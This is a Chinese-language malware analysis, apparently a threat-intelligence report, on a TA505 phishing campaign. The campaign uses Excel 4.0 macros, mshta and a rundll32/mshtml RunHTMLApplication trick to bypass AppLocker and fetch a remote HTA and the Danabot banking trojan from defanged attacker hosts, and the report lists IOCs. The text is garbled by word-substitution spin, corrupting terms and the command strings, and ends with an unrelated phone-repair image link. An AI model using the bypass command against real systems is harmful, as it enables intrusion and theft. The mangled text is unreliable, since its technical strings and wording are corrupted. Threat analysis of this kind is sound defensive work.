TA505组织是一个紧张针对银行金融机构的网络攻击组织,该组织常日采取大范围发送恶意邮件的办法履行攻击,传播Dridex银行木马、Locker打单病毒等恶意程序。
钓鱼Excel:文档隐含恶意Excel4.0宏代码
攻击者利用携带Excel4.0宏的恶意文档履行钓鱼攻击,与今年年初360威胁情报中央表露的TA505组织攻击中所利用的攻击手腕相同。在本例攻击中,钓鱼文档利用迷惑性的文件名“Required Amazon trading guideline..xls”,并在文档中利用显眼的提示语哀求受害者启用宏。
图1 打开文档后展示显眼的提示语哀求受害者启用宏
恶意文档中携带的是Excel4.0宏代码。由于Excel4.0宏相较于一样平常的宏代码涌现频率较少且在复合二进制文件格式中的存储办法独特,携带Excel4.0宏的恶意文档更随意马虎躲避杀毒软件的查杀。在这例恶意样本中,Excel4.0宏代码存在于隐蔽的表单中,这与之前360威胁情报中央表露的TA505组织攻击中恶意宏代码的存储位置相同。
图2 恶意宏代码被存储在隐蔽的表单中
当恶意宏代码实行后,将利用系统运用程序mshta.exe远程实行存放于做事器上的恶意hta脚本文件。脚本存放地址为hxxp://185.236.78.122:8115/stylesheet。
图3 恶意宏代码通过mshta.exe实行远程做事器上的恶意hta文件
新型手腕:绕过Windows系统的AppLocker防护机制
存放在远程做事器上的恶意hta文件“stylesheet”中包含经由稠浊的JS代码,这段JS代码紧张用于检测系统环境并将网络到的信息回传给做事器。
图4 解稠浊前的部分JS代码
图5 解稠浊后的部分JS代码
不过这段恶意JS的最大亮点并不在于信息网络,而在于其利用一种尚未被表露的攻击手腕能绕过Windows系统的AppLocker防护机制或软件限定策略。
该JS代码会启动rundll32进程,并带上参数hxxp://185.236.78.122:8115/stylesheet?sid=xxx;csrf=;\..\..\..\mshtml,RunHTMLApplication。这段命令行参数对付安全研究者来说并不陌生——早在2014年就有安全研究员提出类似的方法绕过AppLocker,该方法是利用合法的系统程序Rundll32实行javascript代码实现的。命令行格式图6所示。个中“xxxxxxxxxxxxxxxx”表示待实行的javascript代码。
图6 2014年公开的利用rundll32实行Javascript代码绕过AppLocker的方法
这种攻击手腕合理利用了rundll32.exe处理命令行的逻辑以及RunHTMLApplication函数的灵巧性。rundll32进程会查找命令行中的逗号,将逗号前的字符串视为加载的dll路径,将逗号后的字符串直到空格涌现的部分视为待实行的导出函数。Rundll32会根据字符串“javascript:\"大众\..\mshtml”到磁盘中查找相应的dll,由于“\..\”符号会将该符号前的字符串摈弃,因此rundll32从当前目录开始查找mshtml,直到找到合法的mshtml.dll的路径,之后调用mshtml.dll程序中名为RunHTMLApplication的导出函数,并将命令行中字符串“RunHTMLApplication”之后的内容作为该函数的参数通报给它。
不过RunHTMLApplication这个函数并不会循规蹈矩,而是重新获取一次进程命令行参数,并将进程命令行参数作为自身的参数通报,因此终极通报给RunHTMLApplication函数的参数为“javascript:\公众\..\mshtml,RunHTMLApplication \"大众;xxxxxxxxxxxxxxxx”。个中“javascript:”见告URL Moniker,在这之后是一段Javascript代码,而“\"大众\..\mshtml, RunHTMLApplication \公众;xxxxxxxxxxxxxxxx”则是Javascript代码内容,由于分号前的部分是被引号标记为是一个字符串,并不影响Javascript代码的功能,因此xxxxxxxxxxxxxxxx代表的Javascript代码将被作为实际的功能代码实行。
图7 rundll32解析命令行实行JS代码示意图
而TA505组织的这例攻击正是在这根本上利用了RunHTMLApplication函数的灵巧性。在对Windows系统中自带的运用程序的逆向过程中不难创造,mhsta.exe正是调用RunHTMLApplication函数完成事情的。可以很随意马虎在mhsta.exe中找到对RunHTMLApplication函数的调用,个中RunHTMLApplication函数吸收的第三个参数正是mshta.exe的进程命令行参数。
图 8 mshta.exe调用RunHTMLApplication函数的代码截图
在上文中提到,恶意Excel4.0宏便是通过mshta实行存放在远程做事器上的恶意hta文件,mshta.exe的进程命令行便是恶意hta文件的url。这意味着RunHTMLApplication函数也可以接管这样一个url作为参数去实行远程做事器上的恶意hta文件。攻击者基于这点,布局了如图9所示构造的命令,利用rundll32加载mshtml.dll的导出函数RunHTMLApplication实行远程做事器上的hta文件,借此绕过Applocker。这是一种尚未被表露的攻击手腕。
图9 攻击者布局的命令
图10 rundll32解析命令行实行远程做事器上的hta文件示意图
在RunHTMLApplication函数被调用时,图中所示的url前半部分会与固定的url后半部分“;\..\..\..\mshtml,RunHTMLApplication”拼接成完全的url,RunHTMLApplication函数实行存放在该url中的hta文件。从抓包结果不丢脸出,在这例攻击中,RunHTMLApplication将实行url为hxxp://185.236.78.122:8115/stylesheet?sid=xxxx;csrf=;\..\..\..\mshtml,RunHTMLApplication的恶意hta文件。
图11 抓包结果
恶意操作:下发银行木马Danabot盗取敏感信息
rundll32实行远程做事器上的hta文件成功后,将通过Bitsadmin从hxxp://amazonchik.site/1.dat下载银行木马Danabot并实行,紧张功能由1.dat的导出函数f0实现。
图12 Danabot银行木马实行紧张功能的导出函数f0
该Danabot银行木马与C&C做事器89.144.25.104连接,吸收掌握真个命令实行敏感信息盗取、远程Shell等恶意操作。
图13 Danabot与C&C做事器的连接
安全建议:
1. 切勿随意打开来源不明的陌生文档,同时也不该用邮箱“文档预览”模式查看文档,由于携带恶意代码的文档也可能在预览模式中触发。
2. 请确保在安全软件开启下打开文档,若文档中携带宏,请只管即便避免启用宏。
3. 目前360安全大脑已经能够防御最新的利用rundll32绕过AppLocker的攻击技能。前往weishi.360.cn安装利用360安全卫士,能有效拦截此类攻击,保护个人数据及财产安全。
IOC
md5
e41a6f430c349df8d5c53758f7792500
00f64cd51fe7792f271751138666ed72
url
hxxp://185.236.78.122:8115/stylesheet
hxxp://amazonchik.site/1.dat
IP
89.144.25.104
![[手机维修自学教程]苹果6SPLUS后置摄像电路的工作事理和维修方法_暗记_旗子](http://www.iirqv.cn/zb_users/cache/ly_autoimg/m/MjE3MjM.png)
